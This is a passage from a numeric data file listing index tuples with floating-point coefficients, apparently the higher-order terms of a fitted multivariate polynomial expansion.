[4,5,7,10 , -1.0289138816e-09],
[4,5,7,10,10,10 , -3.42096621772e-12],
[4,5,7,10,11,11 , -3.38944290912e-12],
[4,5,8,8,8,11 , -6.05918962472e-11],
[4,5,8,8,9,10 , -6.11216113124e-11],
[4,5,8,8,10 , -1.36522399992e-09],
[4,5,8,9,9,11 , -6.13463298144e-11],
[4,5,8,9,11 , -1.37279604055e-09],
[4,5,8,10 , -7.44607307905e-20],
[4,5,8,10,10,11 , -6.69775914946e-11],
[4,5,8,11 , -3.07119887838e-08],
[4,5,8,11,11,11 , -6.71076369058e-11],
[4,5,9 , -3.76069393691e-20],
[4,5,9,9,9,10 , -6.11790465795e-11],
[4,5,9,9,10 , -1.37709030952e-09],
[4,5,9,10 , -3.07606000309e-08],
[4,5,9,10,10,10 , -6.72416307949e-11],
[4,5,9,10,11,11 , -6.75590349422e-11],
[4,5,9,11 , 7.27435038388e-20],
[4,5,10 , -3.87053025845e-07],
[4,5,10,10,10 , -1.52761634873e-09],
[4,5,10,11,11 , -1.53090709997e-09],
[4,5,11 , 2.93496916224e-19],
[4,6,6,6,6,10 , -5.25963762403e-12],
[4,6,6,6,7,11 , 1.84733101208e-12],
[4,6,6,6,8,10 , 4.87446967426e-11],
[4,6,6,6,9,11 , 4.85597996857e-11],
[4,6,6,6,11 , 9.13474298699e-10],
[4,6,6,7,7,10 , 2.35976388735e-13],
[4,6,6,7,8,11 , -3.70244456989e-11],
[4,6,6,7,9,10 , -3.6783219065e-11],
[4,6,6,7,10 , -7.01871642935e-10],
[4,6,6,8,8,10 , 1.66790094509e-13],
[4,6,6,8,9,11 , -8.00765841245e-13],
[4,6,6,8,11 , 5.63940483444e-11],
[4,6,6,9,9,10 , -2.1060836101e-12],
[4,6,6,9,10 , 2.41090162499e-11],
[4,6,6,10 , 2.11350696092e-09],
[4,6,6,10,10,10 , 1.00986912179e-11],
[4,6,6,10,11,11 , 1.04154755706e-11],
[4,6,7,7,7,11 , -1.44013962753e-12],
[4,6,7,7,8,10 , 2.78204374129e-11],
[4,6,7,7,9,11 , 2.75598376853e-11],
[4,6,7,7,11 , 5.3500725235e-10],
[4,6,7,8,8,11 , 4.20297593302e-12],
[4,6,7,8,9,10 , 4.84814161964e-12],
[4,6,7,8,10 , 4.07955312724e-11],
[4,6,7,9,9,11 , 5.77095207629e-12],
[4,6,7,9,11 , 6.00716174276e-11],
[4,6,7,10,10,11 , -3.20371199502e-12],
[4,6,7,11 , -2.63286467073e-10],
[4,6,7,11,11,11 , -2.45643244826e-12],
[4,6,8 , -5.03984603616e-20],
[4,6,8,8,8,10 , -9.42668298959e-11],
[4,6,8,8,9,11 , -9.42353049487e-11],
[4,6,8,8,11 , -2.09943623962e-09],
[4,6,8,9,9,10 , -9.43521980144e-11],
[4,6,8,9,10 , -2.10010938802e-09],
[4,6,8,10 , -4.68830865019e-08],
[4,6,8,10,10,10 , -1.0394100435e-10],
[4,6,8,10,11,11 , -1.03818305735e-10],
[4,6,8,11 , -3.92836344708e-20],
[4,6,9,9,9,11 , -9.37047535738e-11],
[4,6,9,9,11 , -2.09622187454e-09],
[4,6,9,10 , 3.83369262597e-20],
[4,6,9,10,10,11 , -1.04168048315e-10],
[4,6,9,11 , -4.66755534655e-08],
[4,6,9,11,11,11 , -1.03883026027e-10],
[4,6,10 , -5.70238461959e-19],
[4,6,10,10,11 , -2.34304317191e-09],
[4,6,11 , -7.1718576865e-07],
[4,6,11,11,11 , -2.34968612209e-09],
[4,7,7,7,7,10 , 1.44247509852e-12],
[4,7,7,7,8,11 , -2.07974184648e-11],
[4,7,7,7,9,10 , -2.06619330824e-11],
[4,7,7,7,10 , -3.70129825226e-10],
[4,7,7,8,8,10 , -6.65055017182e-12],
[4,7,7,8,9,11 , -7.08852551086e-12],
[4,7,7,8,11 , -1.0327280318e-10],
[4,7,7,9,9,10 , -7.96751949972e-12],
[4,7,7,9,10 , -9.88985931406e-11],
[4,7,7,10 , -2.30746120354e-09],
[4,7,7,10,10,10 , -2.54062723525e-12],
[4,7,7,10,11,11 , -1.56666489238e-12],
[4,7,8,8,8,11 , 7.08970029354e-11],
[4,7,8,8,9,10 , 7.06415485724e-11],
[4,7,8,8,10 , 1.58435000237e-09],
[4,7,8,9,9,11 , 7.04693302748e-11],
[4,7,8,9,11 , 1.57691063405e-09],
[4,7,8,10 , 8.52792192269e-20],
[4,7,8,10,10,11 , 7.89234743354e-11],
[4,7,8,11 , 3.62167994999e-08],
[4,7,8,11,11,11 , 7.88180539355e-11],
[4,7,9 , 6.35407059339e-20],
[4,7,9,9,9,10 , 7.0091423825e-11],
[4,7,9,9,10 , 1.57745134943e-09],
[4,7,9,10 , 3.51688943832e-08],
[4,7,9,10,10,10 , 7.94812699789e-11],
[4,7,9,10,11,11 , 7.89669128343e-11],
[4,7,9,11 , -8.56551728153e-20],
[4,7,10 , 6.33282398046e-07],
[4,7,10,10,10 , 1.79741703181e-09],
[4,7,10,11,11 , 1.78792601648e-09],
[4,7,11 , -4.92959940412e-19],
[4,8 , -1.52465930506e-20],
[4,8,8 , 1.11437772123e-20],
[4,8,8,8,8,10 , 1.93207435006e-11],
[4,8,8,8,9,11 , 2.17070348461e-11],
[4,8,8,8,11 , 3.06325932032e-10],
[4,8,8,9,9,10 , 2.27021009929e-11],
[4,8,8,9,10 , 3.7946688133e-10],
[4,8,8,10 , 6.82737615439e-09],
[4,8,8,10,10,10 , -1.95825953572e-12],
[4,8,8,10,11,11 , -3.46021390823e-12],
[4,8,8,11 , 2.23673773537e-20],
[4,8,9,9,9,11 , 2.50926107973e-11],
[4,8,9,9,11 , 4.15849060966e-10],
[4,8,9,10 , 1.21488016566e-20],
[4,8,9,10,10,11 , -1.03577069225e-12],
[4,8,9,11 , 8.24884104345e-09],
[4,8,9,11,11,11 , -1.52058105169e-12],
[4,8,10 , 4.492450994e-19],
[4,8,10,10,11 , -2.03784705663e-10],
[4,8,11 , 1.39973350887e-07],
[4,8,11,11,11 , -2.29483029062e-10],
[4,9 , 2.79520872594e-20],
[4,9,9 , 3.18166750812e-20],
[4,9,9,9,9,10 , 2.76161769455e-11],
[4,9,9,9,10 , 4.94641042751e-10],
[4,9,9,10 , 9.68055939633e-09],
[4,9,9,10,10,10 , 2.4936317917e-12],
[4,9,9,10,11,11 , 1.39612168418e-12],
[4,9,9,11 , -3.30131918373e-20],
[4,9,10 , 1.97256045803e-07],
[4,9,10,10,10 , -1.25844418324e-10],
[4,9,10,11,11 , -1.49916308012e-10],
[4,9,11 , -3.58268466909e-19],
[4,10 , -2.28698895759e-20],
[4,10,10 , -5.19337075785e-20],
[4,10,10,10 , -7.22132126525e-09],
[4,10,10,10,10,10 , -2.41738996756e-11],
[4,10,10,10,11,11 , -2.33885534143e-11],
[4,10,11,11 , -7.06471854448e-09],
[4,10,11,11,11,11 , -2.63386085304e-11],
[4,11 , 4.319868031e-20],
[4,11,11 , -3.0837293236e-20],
[4,11,11,11 , 1.75200989642e-20],
[5,5 , 3.89296923449e-05],
[5,5,5 , -2.21122973303e-07],
[5,5,5,5 , 4.73899361368e-09],
[5,5,5,5,5 , -1.20910053191e-10],
[5,5,5,5,5,5 , 2.1265577845e-12],
[5,5,5,5,5,7 , 1.25215787513e-12],
[5,5,5,5,5,9 , -2.29331673858e-12],
[5,5,5,5,6,6 , -2.54442739401e-12],
[5,5,5,5,6,8 , -2.43007850559e-12],
[5,5,5,5,7 , -9.11309796312e-12],
[5,5,5,5,7,7 , 8.71673272104e-13],
[5,5,5,5,7,9 , 2.58098743835e-12],
[5,5,5,5,8,8 , 7.59574625222e-12],
[5,5,5,5,9 , 1.51066859594e-10],
[5,5,5,5,9,9 , 8.88710227849e-12],
[5,5,5,5,10,10 , 9.91417344746e-12],
[5,5,5,5,11,11 , 1.05915677252e-11],
[5,5,5,6,6 , -4.25132868503e-11],
[5,5,5,6,6,7 , 3.05728458589e-12],
[5,5,5,6,6,9 , -2.70699630683e-12],
[5,5,5,6,7,8 , 2.23667489666e-12],
[5,5,5,6,8 , 2.01572042993e-10],
[5,5,5,6,8,9 , 1.27108456891e-11],
[5,5,5,6,10,11 , 1.60128845457e-11],
[5,5,5,7 , 2.61679500222e-09],
[5,5,5,7,7 , -1.12022734045e-10],
[5,5,5,7,7,7 , 3.54338545921e-12],
[5,5,5,7,7,9 , -9.08370917048e-13],
[5,5,5,7,8,8 , -9.52768037439e-12],
[5,5,5,7,9 , -1.88742650193e-10],
[5,5,5,7,9,9 , -9.15894842312e-12],
[5,5,5,7,10,10 , -1.18727174344e-11],
[5,5,5,7,11,11 , -1.22745057905e-11],
[5,5,5,8,8 , 1.19712553104e-10],
[5,5,5,8,8,9 , 3.64098527182e-12],
[5,5,5,8,10,11 , 5.93976995151e-12],
[5,5,5,9 , 2.96967644278e-09],
[5,5,5,9,9 , 8.083860587e-11],
[5,5,5,9,9,9 , 3.91545184432e-12],
[5,5,5,9,10,10 , 5.74637856442e-12],
[5,5,5,9,11,11 , 5.9358824692e-12],
[5,5,5,10,10 , 1.45416094645e-10],
[5,5,5,11,11 , 1.43572787174e-10],
[5,5,6,6 , 8.29917716326e-10],
[5,5,6,6,6,6 , -6.54124124605e-12],
[5,5,6,6,6,8 , -3.80901041852e-12],
[5,5,6,6,7 , 5.22675888795e-11],
[5,5,6,6,7,7 , -3.72552099596e-12],
[5,5,6,6,7,9 , 2.54324918116e-12],
[5,5,6,6,8,8 , 1.94177645615e-11],
[5,5,6,6,9 , 3.17710088025e-10],
[5,5,6,6,9,9 , 1.93927396493e-11],
[5,5,6,6,10,10 , 2.44188586955e-11],
[5,5,6,6,11,11 , 2.46494464019e-11],
[5,5,6,7,7,8 , -1.52022475013e-12],
[5,5,6,7,8 , -2.46878940198e-10],
[5,5,6,7,8,9 , -1.49445468413e-11],
[5,5,6,7,10,11 , -1.90148688152e-11],
[5,5,6,8 , 2.94669863319e-09],
[5,5,6,8,8,8 , 4.62053287457e-12],
[5,5,6,8,9 , 1.02870713659e-10],
[5,5,6,8,9,9 , 3.11961922807e-12],
[5,5,6,8,10,10 , 7.61822482658e-12],
[5,5,6,8,11,11 , 7.64830037136e-12],
[5,5,6,9,10,11 , 6.76931246041e-12],
[5,5,6,10,11 , 1.66401776173e-10],
[5,5,7 , -3.72434792135e-07],
[5,5,7,7 , 7.44100817223e-09],
[5,5,7,7,7 , -1.21925959131e-10],
[5,5,7,7,7,7 , 2.53923515026e-12],
[5,5,7,7,7,9 , 1.98713288743e-12],
[5,5,7,7,8,8 , 1.18219019113e-11],
[5,5,7,7,9 , 1.54075620273e-10],
[5,5,7,7,9,9 , 1.20422993297e-11],
[5,5,7,7,10,10 , 1.47469688059e-11],
[5,5,7,7,11,11 , 1.52698549705e-11],
[5,5,7,8,8 , -6.35096350999e-11],
[5,5,7,8,8,9 , -6.63799500732e-13],
[5,5,7,8,10,11 , -3.65922200501e-12],
[5,5,7,9 , 1.29797330218e-11],
[5,5,7,9,9 , -7.69942506762e-11],
[5,5,7,9,9,9 , 2.31693937385e-13],
[5,5,7,9,10,10 , -2.67412760689e-12],
[5,5,7,9,11,11 , -3.31165626116e-12],
[5,5,7,10,10 , -8.92001528913e-11],
[5,5,7,11,11 , -1.03472733551e-10],
[5,5,8 , -4.36195498056e-19],
[5,5,8,8 , -2.07390881227e-08],
[5,5,8,8,8,8 , -4.03401012373e-11],
[5,5,8,8,9 , -9.35213737517e-10],
[5,5,8,8,9,9 , -4.24602279874e-11],
[5,5,8,8,10,10 , -4.68857779145e-11],
[5,5,8,8,11,11 , -4.78594509109e-11],
[5,5,8,9,10,11 , -4.85851705936e-11],
[5,5,8,10,11 , -1.09184669491e-09],
[5,5,9 , -2.71232430959e-07],
[5,5,9,9 , -1.97805676776e-08],
[5,5,9,9,9 , -8.8800155866e-10],
[5,5,9,9,9,9 , -3.78427925898e-11],
[5,5,9,9,10,10 , -4.8391120531e-11],
[5,5,9,9,11,11 , -4.8214885868e-11],
[5,5,9,10,10 , -1.08100679565e-09],
[5,5,9,11,11 , -1.0838836922e-09],
[5,5,10 , 3.75738521446e-20],
[5,5,10,10 , -2.60149053036e-08],
[5,5,10,10,10,10 , -4.89288926026e-11],
[5,5,10,10,11,11 , -5.07087237385e-11],
[5,5,11,11 , -2.58541702294e-08],
[5,5,11,11,11,11 , -4.99144486538e-11],
[5,6 , 1.77876918923e-20],
[5,6,6 , 1.11150971702e-07],
[5,6,6,6,6 , -1.18541204951e-10],
[5,6,6,6,6,7 , 7.55715558793e-12],
[5,6,6,6,6,9 , -5.89099354202e-12],
[5,6,6,6,7,8 , 3.21864888448e-12],
[5,6,6,6,8 , 4.88739086391e-10],
[5,6,6,6,8,9 , 3.06636065342e-11],
[5,6,6,6,10,11 , 3.86590554435e-11],
[5,6,6,7 , -2.19348706928e-09],
[5,6,6,7,7 , -4.81653985401e-11],
[5,6,6,7,7,7 , 4.55578292164e-12],
[5,6,6,7,7,9 , -1.65730493993e-12],
[5,6,6,7,8,8 , -2.3216431113e-11],
[5,6,6,7,9 , -3.75465007574e-10],
[5,6,6,7,9,9 , -2.3101569803e-11],
[5,6,6,7,10,10 , -2.94203709701e-11],
[5,6,6,7,11,11 , -2.96209289227e-11],
[5,6,6,8,8 , 1.30991673311e-10],
[5,6,6,8,8,9 , 3.24484775251e-12],
[5,6,6,8,10,11 , 9.2369407431e-12],
[5,6,6,9 , 3.79305515822e-09],
[5,6,6,9,9 , 1.11222316491e-10],
[5,6,6,9,9,9 , 2.30953607889e-12],
[5,6,6,9,10,10 , 8.3961259493e-12],
[5,6,6,9,11,11 , 8.45500386998e-12],
[5,6,6,10,10 , 2.18097714107e-10],
[5,6,6,11,11 , 2.19475770361e-10],
[5,6,7,7,7,8 , 7.49710595826e-13],
[5,6,7,7,8 , 2.86496581354e-10],
[5,6,7,7,8,9 , 1.75956391614e-11],
[5,6,7,7,10,11 , 2.27954409327e-11],
[5,6,7,8 , -2.11974100938e-09],
[5,6,7,8,8,8 , -9.4826051365e-14],
[5,6,7,8,9 , -4.29971256442e-11],
[5,6,7,8,9,9 , 7.98799316056e-13],
[5,6,7,8,10,10 , -3.77774189822e-12],
[5,6,7,8,11,11 , -3.7402796817e-12],
[5,6,7,9,10,11 , -3.08438994959e-12],
[5,6,7,10,11 , -1.00927272762e-10],
[5,6,8 , -3.28913004049e-07],
[5,6,8,8 , -9.85866941265e-20],
[5,6,8,8,8 , -1.45271630487e-09],
[5,6,8,8,8,9 , -6.63108836602e-11],
[5,6,8,8,10,11 , -7.46223341437e-11],
[5,6,8,9 , -3.06193458597e-08],
[5,6,8,9,9 , -1.46601732876e-09],
[5,6,8,9,9,9 , -6.69216599474e-11],
[5,6,8,9,10,10 , -7.50969210067e-11],
[5,6,8,9,11,11 , -7.55113449972e-11],
[5,6,8,10,10 , -1.68734437533e-09],
[5,6,8,11,11 , -1.70160831222e-09],
[5,6,9 , 5.3564246002e-19],
[5,6,9,9 , 9.88356754909e-20],
[5,6,9,9,10,11 , -7.58306789943e-11],
[5,6,9,10,11 , -1.70330153832e-09],
[5,6,10,10 , -6.14152653499e-20],
[5,6,10,10,10,11 , -7.90362220693e-11],
[5,6,10,11 , -3.93140303306e-08],
[5,6,10,11,11,11 , -7.99664957651e-11],
[5,6,11 , 3.22401915549e-20],
[5,6,11,11 , 6.16290915383e-20],
[5,7,7 , -4.59466414062e-07],
[5,7,7,7 , 9.41457901134e-09],
[5,7,7,7,7 , -2.31711035503e-10],
[5,7,7,7,7,7 , 8.91484305361e-12],
[5,7,7,7,7,9 , 1.65861394026e-12],
[5,7,7,7,8,8 , -1.24901400249e-11],
[5,7,7,7,9 , -2.85808987696e-10],
[5,7,7,7,9,9 , -1.1237152655e-11],
[5,7,7,7,10,10 , -1.62626319367e-11],
[5,7,7,7,11,11 , -1.64195417612e-11],
[5,7,7,8,8 , -8.09810454039e-12],
[5,7,7,8,8,9 , -2.6503853906e-12],
[5,7,7,8,10,11 , 2.36039477836e-13],
[5,7,7,9 , 4.49786145175e-09],
[5,7,7,9,9 , -2.54198315431e-11],
[5,7,7,9,9,9 , -3.76925496171e-12],
[5,7,7,9,10,10 , -7.34989889556e-13],
[5,7,7,9,11,11 , -2.47567551417e-13],
[5,7,7,10,10 , 2.08672170453e-11],
[5,7,7,11,11 , 2.08192395184e-11],
[5,7,8 , 2.11215606332e-19],
[5,7,8,8 , 2.38753414212e-08],
[5,7,8,8,8,8 , 5.02528465339e-11],
[5,7,8,8,9 , 1.10627256859e-09],
[5,7,8,8,9,9 , 5.09126105294e-11],
[5,7,8,8,10,10 , 5.71883142374e-11],
[5,7,8,8,11,11 , 5.76899803968e-11],
[5,7,8,9,10,11 , 5.73796690935e-11],
[5,7,8,10,11 , 1.29869104509e-09],
[5,7,9 , 1.33418850099e-07],
[5,7,9,9 , 2.47899578325e-08],
[5,7,9,9,9 , 1.10190408832e-09],
[5,7,9,9,9,9 , 5.62805969245e-11],
[5,7,9,9,10,10 , 5.84009848039e-11],
[5,7,9,9,11,11 , 5.82935663914e-11],
[5,7,9,10,10 , 1.30446852446e-09],
[5,7,9,11,11 , 1.30324370379e-09],
[5,7,10 , -2.45374856908e-20],
[5,7,10,10 , 3.02473671837e-08],
[5,7,10,10,10,10 , 6.23279638451e-11],
[5,7,10,10,11,11 , 6.19476971078e-11],
[5,7,11,11 , 3.09448834142e-08],
[5,7,11,11,11,11 , 6.39820547174e-11],
[5,8 , -3.72694496792e-20],
[5,8,8 , -9.04661970021e-08],
[5,8,8,8,8 , -5.92579393475e-11],
[5,8,8,8,8,9 , 7.21783564596e-12],
[5,8,8,8,10,11 , -1.05994195232e-11],
[5,8,8,9 , -1.00562822348e-09],
[5,8,8,9,9 , 7.92166549617e-11],
[5,8,8,9,9,9 , 1.02047793533e-11],
[5,8,8,9,10,10 , -7.0480045462e-12],
[5,8,8,9,11,11 , -7.68781499304e-12],
[5,8,8,10,10 , -3.62254471637e-10],
[5,8,8,11,11 , -3.45972336037e-10],
[5,8,9 , -3.91223342513e-20],
[5,8,9,9,10,11 , -5.27014440856e-12],
[5,8,9,10,11 , -2.91981513253e-10],
[5,8,10,10 , -3.53470819356e-20],
[5,8,10,10,10,11 , -2.81174965439e-11],
[5,8,10,11 , -1.19410319712e-08],
[5,8,10,11,11,11 , -2.73667165656e-11],
[5,8,11 , -3.53900953275e-20],
[5,9 , 4.40457132572e-20],
[5,9,9 , -1.27265303579e-07],
[5,9,9,9 , 1.20928803346e-09],
[5,9,9,9,9 , 8.860786044e-11],
[5,9,9,9,9,9 , -1.04229761485e-11],
[5,9,9,9,10,10 , -4.81165461688e-12],
[5,9,9,9,11,11 , -6.88563862485e-12],
[5,9,9,10,10 , -2.58927154767e-10],
[5,9,9,11,11 , -2.71714801033e-10],
[5,9,10 , -4.11075677214e-20],
[5,9,10,10 , -1.10359913106e-08],
[5,9,10,10,10,10 , -2.45102496096e-11],
[5,9,10,10,11,11 , -2.46974165382e-11],
[5,9,10,11 , 2.0234078554e-20],
[5,9,11,11 , -1.12325632309e-08],
[5,9,11,11,11,11 , -2.81691785013e-11],
[5,10 , 1.01643953671e-20],
[5,10,10 , -4.08522824124e-07],
[5,10,10,10,10 , -7.45476488901e-10],
[5,10,10,11,11 , -6.99396516753e-10],
[5,11,11 , -4.52623631061e-07],
[5,11,11,11,11 , -7.59131514903e-10],
[6,6 , 4.53797985501e-05],
[6,6,6,6 , 5.69429165949e-09],
[6,6,6,6,6,6 , -2.07186249549e-11],
[6,6,6,6,6,8 , -7.42563882204e-12],
[6,6,6,6,7 , 9.63164662397e-11],
[6,6,6,6,7,7 , -8.78381472076e-12],
[6,6,6,6,7,9 , 4.57076918526e-12],
[6,6,6,6,8,8 , 4.60925182856e-11],
[6,6,6,6,9 , 8.15129212016e-10],
[6,6,6,6,9,9 , 4.54504757931e-11],
[6,6,6,6,10,10 , 5.81085225362e-11],
[6,6,6,6,11,11 , 5.72322408643e-11],
[6,6,6,7,7,8 , -1.76820251793e-12],
[6,6,6,7,8 , -6.0182320356e-10],
[6,6,6,7,8,9 , -3.61822368333e-11],
[6,6,6,7,10,11 , -4.55913362013e-11],
[6,6,6,8 , 6.23674439857e-09],
[6,6,6,8,8,8 , 2.88212978776e-12],
[6,6,6,8,9 , 1.4606059529e-10],
[6,6,6,8,9,9 , 1.38375968315e-12],
[6,6,6,8,10,10 , 1.09368477126e-11],
[6,6,6,8,11,11 , 1.09237281273e-11],
[6,6,6,9 , -1.06685619504e-20],
[6,6,6,9,10,11 , 9.71509753344e-12],
[6,6,6,10,11 , 2.68841347009e-10],
[6,6,7 , -1.95165441159e-07],
[6,6,7,7 , 3.3615720387e-09],
[6,6,7,7,7 , 1.74210856675e-11],
[6,6,7,7,7,7 , -4.80574763783e-12],
[6,6,7,7,7,9 , 8.09165201794e-13],
[6,6,7,7,8,8 , 2.69372657822e-11],
[6,6,7,7,9 , 4.67354360633e-10],
[6,6,7,7,9,9 , 2.68210462039e-11],
[6,6,7,7,10,10 , 3.46953962881e-11],
[6,6,7,7,11,11 , 3.4768585513e-11],
[6,6,7,8,8 , -2.80200422964e-11],
[6,6,7,8,8,9 , 3.12524928882e-12],
[6,6,7,8,10,11 , -3.2026323528e-12],
[6,6,7,9 , -3.62959259012e-09],
[6,6,7,9,9 , -1.90774655351e-11],
[6,6,7,9,9,9 , 6.86275354012e-12],
[6,6,7,9,10,10 , -1.30263561127e-12],
[6,6,7,9,11,11 , -1.84637221279e-12],
[6,6,7,10,10 , -9.80071325959e-11],
[6,6,7,11,11 , -9.46216836794e-11],
[6,6,8 , -8.89649292413e-19],
[6,6,8,8 , -4.75714540065e-08],
[6,6,8,8,8 , -1.06543641707e-20],
[6,6,8,8,8,8 , -1.03823585179e-10],
[6,6,8,8,9 , -2.21216736793e-09],
[6,6,8,8,9,9 , -1.02341603642e-10],
[6,6,8,8,10,10 , -1.15839617348e-10],
[6,6,8,8,11,11 , -1.15564267694e-10],
[6,6,8,9,10,11 , -1.16009157364e-10],
[6,6,8,10,11 , -2.61578490203e-09],
[6,6,9 , -5.58452679966e-07],
[6,6,9,9 , -4.80491445789e-08],
[6,6,9,9,9 , -2.12392247055e-09],
[6,6,9,9,9,9 , -1.07305678104e-10],
[6,6,9,9,10,10 , -1.17614216964e-10],
[6,6,9,9,11,11 , -1.16157235086e-10],
[6,6,9,10,10 , -2.61088263718e-09],
[6,6,9,11,11 , -2.58703520261e-09],
[6,6,10 , 6.25745589784e-20],
[6,6,10,10 , -6.21330696856e-08],
[6,6,10,10,10,10 , -1.27696382579e-10],
[6,6,10,10,11,11 , -1.23836393616e-10],
[6,6,11 , -1.31819502416e-20],
[6,6,11,11 , -6.1746863009e-08],
[6,6,11,11,11,11 , -1.25921913668e-10],
[6,7 , 2.71050543121e-20],
[6,7,7,7,7,8 , -6.57565225169e-13],
[6,7,7,7,8 , -3.27530130679e-10],
[6,7,7,7,8,9 , -2.06953547342e-11],
[6,7,7,7,10,11 , -2.67692434193e-11],
[6,7,7,8 , 6.47043591762e-10],
[6,7,7,8,8,8 , -6.29721465511e-12],
[6,7,7,8,9 , -4.75568857736e-11],
[6,7,7,8,9,9 , -6.28030353091e-12],
[6,7,7,8,10,10 , -2.10639828802e-12],
[6,7,7,8,11,11 , -2.06196687127e-12],
[6,7,7,9,10,11 , -2.37645807813e-12],
[6,7,7,10,11 , -1.26281817818e-11],
[6,7,8 , 4.90499252701e-07],
[6,7,8,8 , 1.17065909011e-19],
[6,7,8,8,8 , 1.71098195019e-09],
[6,7,8,8,8,9 , 7.70187062792e-11],
[6,7,8,8,10,11 , 8.8243142686e-11],
[6,7,8,9 , 3.66016594659e-08],
[6,7,8,9,9 , 1.6977219233e-09],
[6,7,8,9,9,9 , 7.59589315898e-11],
[6,7,8,9,10,10 , 8.82438554075e-11],
[6,7,8,9,11,11 , 8.80152711888e-11],
[6,7,8,10,10 , 2.01214023657e-09],
[6,7,8,11,11 , 2.01553267519e-09],
[6,7,9 , -7.99678511547e-19],
[6,7,9,9 , -1.18943195411e-19],
[6,7,9,9,10,11 , 8.82577475464e-11],
[6,7,9,10,11 , 2.00885771594e-09],
[6,7,10,10 , 7.40392822684e-20],
[6,7,10,10,10,11 , 9.51641950604e-11],
[6,7,10,11 , 4.80520759589e-08],
[6,7,10,11,11,11 , 9.52697246073e-11],
[6,7,11 , -3.75076776956e-20],
[6,7,11,11 , -7.636407338e-20],
[6,8 , 3.04931861012e-20],
[6,8,8 , 2.66815378385e-19],
[6,8,8,8 , 3.83456055247e-09],
[6,8,8,8,8,8 , 2.22946562111e-11],
[6,8,8,8,9 , 3.28309677009e-10],
[6,8,8,8,9,9 , 2.34556578638e-11],
[6,8,8,8,10,10 , -4.28047774843e-12],
[6,8,8,8,11,11 , -4.49291814511e-12],
[6,8,8,9 , 1.70200682839e-20],
[6,8,8,9,10,11 , -1.08830476157e-13],
[6,8,8,10,11 , -2.19444150246e-10],
[6,8,9 , 7.26361420569e-08],
[6,8,9,9 , 6.73616624494e-09],
[6,8,9,9,9 , 4.32113030913e-10],
[6,8,9,9,9,9 , 2.90722965855e-11],
[6,8,9,9,10,10 , 1.98318396178e-12],
[6,8,9,9,11,11 , 1.20052262983e-12],
[6,8,9,10,10 , -1.64621115447e-10],
[6,8,9,11,11 , -1.74732046573e-10],
[6,8,10 , -4.69573890134e-20],
[6,8,10,10 , -1.10888921457e-08],
[6,8,10,10,10,10 , -2.8649654243e-11],
[6,8,10,10,11,11 , -2.97759711502e-11],
[6,8,10,11 , -1.24358333291e-20],
[6,8,11,11 , -1.08126128246e-08],
[6,8,11,11,11,11 , -2.94051888295e-11],
[6,9 , 4.06575814682e-20],
[6,9,9 , -2.00640929381e-19],
[6,9,9,9 , -3.12442660974e-20],
[6,9,9,9,10,11 , 4.12792842356e-12],
[6,9,9,10,11 , -1.09577158724e-10],
[6,9,10,10,10,11 , -2.61083918575e-11],
[6,9,10,11 , -9.06907220289e-09],
[6,9,10,11,11,11 , -2.65790683848e-11],
[6,9,11 , -6.23098611824e-20],
[6,9,11,11 , 3.35231486849e-20],
[6,10 , -4.06575814682e-20],
[6,10,10 , -6.96208143084e-19],
[6,10,10,10,11 , -7.64521351867e-10],
[6,10,11 , -4.78846174204e-07],
[6,10,11,11,11 , -7.60046780284e-10],
[6,11 , 3.72694496792e-20],
[6,11,11 , 8.03251931793e-19],
[7,7 , 5.80763595519e-05],
[7,7,7 , -9.17589275414e-07],
[7,7,7,7 , 1.79850893431e-08],
[7,7,7,7,7 , -4.29164568104e-10],
[7,7,7,7,7,7 , 1.11524299133e-11],
[7,7,7,7,7,9 , 4.77061533044e-12],
[7,7,7,7,8,8 , 1.6153892807e-11],
[7,7,7,7,9 , 1.93990563638e-10],
[7,7,7,7,9,9 , 1.79524921707e-11],
[7,7,7,7,10,10 , 2.05310261658e-11],
[7,7,7,7,11,11 , 2.09220710539e-11],
[7,7,7,8,8 , 6.34208649183e-11],
[7,7,7,8,8,9 , 8.88330413179e-12],
[7,7,7,8,10,11 , 4.40835668446e-12],
[7,7,7,9 , 4.63254708324e-09],
[7,7,7,9,9 , 9.98099400541e-12],
[7,7,7,9,9,9 , 1.53159992414e-11],
[7,7,7,9,10,10 , 7.44737864013e-12],
[7,7,7,9,11,11 , 4.95306312432e-12],
[7,7,7,10,10 , 7.86369009582e-11],
[7,7,7,11,11 , 5.22256633224e-11],
[7,7,8 , -9.67973370254e-19],
[7,7,8,8 , -2.91782214679e-08],
[7,7,8,8,8,8 , -5.30862353499e-11],
[7,7,8,8,9 , -1.25707777995e-09],
[7,7,8,8,9,9 , -5.53130864426e-11],
[7,7,8,8,10,10 , -6.39754049157e-11],
[7,7,8,8,11,11 , -6.57318049339e-11],
[7,7,8,9,10,11 , -6.65665933499e-11],
[7,7,8,10,11 , -1.5282729835e-09],
[7,7,9 , -6.10906694403e-07],
[7,7,9,9 , -2.72662774907e-08],
[7,7,9,9,9 , -1.129849096e-09],
[7,7,9,9,9,9 , -4.0461474387e-11],
[7,7,9,9,10,10 , -6.44929275025e-11],
[7,7,9,9,11,11 , -6.4863813877e-11],
[7,7,9,10,10 , -1.48744760497e-09],
[7,7,9,11,11 , -1.49784522017e-09],
[7,7,10 , 6.59626907674e-20],
[7,7,10,10 , -3.8812432142e-08],
[7,7,10,10,10,10 , -6.89501251771e-11],
[7,7,10,10,11,11 , -7.20283007127e-11],
[7,7,11,11 , -3.8394016752e-08],
[7,7,11,11,11,11 , -7.00108060216e-11],
[7,8 , -3.89635155737e-20],
[7,8,8 , -3.97458815296e-07],
[7,8,8,8 , -7.53751789577e-20],
[7,8,8,8,8 , -7.30941865374e-10],
[7,8,8,8,8,9 , -3.16769134571e-11],
[7,8,8,8,10,11 , -1.63080178354e-11],
[7,8,8,9 , -1.54101864999e-08],
[7,8,8,9,9 , -7.65621609648e-10],
[7,8,8,9,9,9 , -3.43119298776e-11],
[7,8,8,9,10,10 , -1.63595691508e-11],
[7,8,8,9,11,11 , -1.73168971198e-11],
[7,8,8,10,10 , -3.2325454392e-10],
[7,8,8,11,11 , -3.13562591942e-10],
[7,8,9 , -1.5950689188e-19],
[7,8,9,9 , 1.93047411358e-20],
[7,8,9,9,10,11 , -2.00170135619e-11],
[7,8,9,10,11 , -3.27894636759e-10],
[7,8,10,10 , -1.8078859468e-20],
[7,8,10,10,10,11 , 2.50630210158e-12],
[7,8,10,11 , -4.02861654794e-09],
[7,8,10,11,11,11 , 3.0419631573e-12],
[7,8,11 , 2.85344224106e-20],
[7,9,9 , -4.86459235886e-07],
[7,9,9,9 , -1.834756407e-08],
[7,9,9,9,9 , -1.03594710583e-09],
[7,9,9,9,9,9 , -1.32898768265e-11],
[7,9,9,9,10,10 , -1.90362377577e-11],
